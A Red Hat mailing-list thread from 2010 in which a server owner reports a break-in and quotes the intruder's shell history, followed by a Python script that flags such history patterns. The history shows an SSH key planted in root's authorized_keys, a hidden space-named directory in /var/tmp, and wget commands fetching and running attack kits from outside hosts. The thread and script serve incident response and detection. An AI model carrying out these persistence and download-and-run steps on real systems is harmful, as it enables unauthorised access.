Still I'm thinking, how did he/she get my password??

On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@xxxxxxxxx> wrote:

> I have changed my root password.
>
> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan@xxxxxxxxx> wrote:
>
>> You may change your root password first, and then you can continue to
>> analyze your system.
>>
>> ________________________________________
>> From: redhat-list-bounces@xxxxxxxxxx [redhat-list-bounces@xxxxxxxxxx] On Behalf Of Joy Methew [ml4joy@xxxxxxxxx]
>> Sent: Thursday, January 28, 2010 12:59 PM
>> To: General Red Hat Linux discussion list
>> Subject: help
>>
>> Hello all,
>> I'm using RHEL5.3 as my mail server with a real IP. I configure my
>> system mostly remotely. The last login time on my system was 27 Jan,
>> from this IP: 118.129.153.43.
>> Then I tried to log in on 28 Jan in the morning, and I couldn't get
>> authenticated as root with my last password.
>> Then I rebooted the system and reset my password.
>> I logged in as root, then I ran the "last" command. I am sending the
>> first 10 lines of the last command... I think someone hacked my system.
>> I am sending the history command output.
>> Now I have removed the .ssh directory and /var/tmp/*.
>>
>> Please suggest, what is this??
>>
>> Thanks
>>
>> last command output:
>> root     pts/1        117.199.118.234  Thu Jan 28 10:58   still logged in
>> root     pts/0        117.199.118.234  Thu Jan 28 10:49   still logged in
>> root     tty1                          Thu Jan 28 10:48 - 10:52  (00:04)
>> reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45          (00:25)
>> root     pts/2        165.red-79-153-1 Thu Jan 28 01:42 - 01:52  (00:09)
>> root     pts/2        165.red-79-153-1 Wed Jan 27 23:02 - 01:27  (02:25)
>> root     pts/2        165.red-79-153-1 Wed Jan 27 22:33 - 22:34  (00:00)
>> root     pts/3        165.red-79-153-1 Wed Jan 27 22:32 - 22:33  (00:00)
>> root     pts/2        118.129.153.43   Wed Jan 27 22:31 - 22:32  (00:01)
>> root     pts/2        117.199.114.189  Wed Jan 27 15:47 - 15:51  (00:03)
>>
>> What is 165.red-79........? This is not my IP.
>>
>> History Output
>>
>>   115  cat /proc/cpuinfo
>>   116  mkdir .ssh
>>   117  cd .ssh
>>   118  echo ssh-rsa
>>
>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>> ~/.ssh/authorized_keys
>>   119  cd /var/tmp
>>   120  mkdir " "
>>   121  cd " "
>>   122  passwd
>>   123  echo ssh-rsa
>>
>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>> ~/.ssh/authorized_keys
>>   124  ps -x
>>   125  cd /var/tmp
>>   126  w
>>   127  wget http://kok.ucoz.de/gosh.tgz
>>   128  tar xvf gosh.tgz
>>   129  cd gosh
>>   130  chmod +x *
>>   131  ./go.sh 121
>>   132  w
>>   133  ps -x
>>   134  ps -aux
>>   135  cd /var/tmp
>>   136  cd " "
>>   137  ls -a
>>   138  wget http://helpbnc.myftp.org/danger/fld.tgz
>>   139  tar xzvf fld.tgz
>>   140  cd fld
>>   141  chmod +x *
>>   142  nano cyc.acc
>>   143  nano cyc.acc.1
>>   144  nano cyc.set
>>   145  ./httpd
>>   146  w
>> --
>> redhat-list mailing list
>> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
>> https://www.redhat.com/mailman/listinfo/redhat-list
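A triage pass over a root shell history like the one quoted in this thread, as an added example that is not part of the original messages: it flags a key written to authorized_keys, a directory named with only spaces, a password change, and downloads or executions that happen while the working directory is under a temp directory. It assumes one history entry per line; the sample history is constructed (placeholder key and URL), and triage_history, TEMP_DIRS and the finding labels are hypothetical names.

```python
import posixpath
import re

TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")  # assumed list of world-writable dirs

# Constructed sample modelled on the quoted history; key and URL are placeholders.
SAMPLE_HISTORY = """\
  118  echo ssh-rsa AAAA...PLACEHOLDER key-comment >> ~/.ssh/authorized_keys
  119  cd /var/tmp
  120  mkdir " "
  121  cd " "
  122  passwd
  127  wget http://example.invalid/kit.tgz
  128  tar xvf kit.tgz
  129  cd kit
  131  ./go.sh 121
"""

# Checks that need only the command text.
RULES = [
    (re.compile(r">>?\s*\S*authorized_keys"), "key written to authorized_keys"),
    (re.compile(r"^(mkdir|cd)\s+([\"'])[\s.]+\2\s*$"), "directory named with only spaces/dots"),
    (re.compile(r"^passwd\b"), "password changed"),
]
DOWNLOAD = re.compile(r"(wget|curl)\b.*\b(https?|ftp)://")

def in_temp(path):
    return any(path == d or path.startswith(d + "/") for d in TEMP_DIRS)

def triage_history(text, home="/root"):
    """Return (history_no, finding, command) tuples; cwd is tracked across cd."""
    cwd, findings = home, []
    for line in text.splitlines():
        m = re.match(r"\s*(\d+)\s+(.*)$", line)
        if not m:
            continue
        num, cmd = int(m.group(1)), m.group(2).strip()
        labels = [label for rx, label in RULES if rx.search(cmd)]
        if in_temp(cwd) and DOWNLOAD.match(cmd):
            labels.append("download into temp dir")
        if in_temp(cwd) and cmd.startswith("./"):
            labels.append("execution from temp dir")
        findings += [(num, label, cmd) for label in labels]
        cd = re.match(r"cd\s+(.+)$", cmd)
        if cd:  # heuristic: strip quotes, map a leading ~ to home, resolve against cwd
            target = re.sub(r"^~", home, cd.group(1).strip("\"'"))
            cwd = posixpath.normpath(posixpath.join(cwd, target))
    return findings
```

Shell history is editable by whoever held the session, so findings here are leads to confirm against other records, and an empty result does not clear a host.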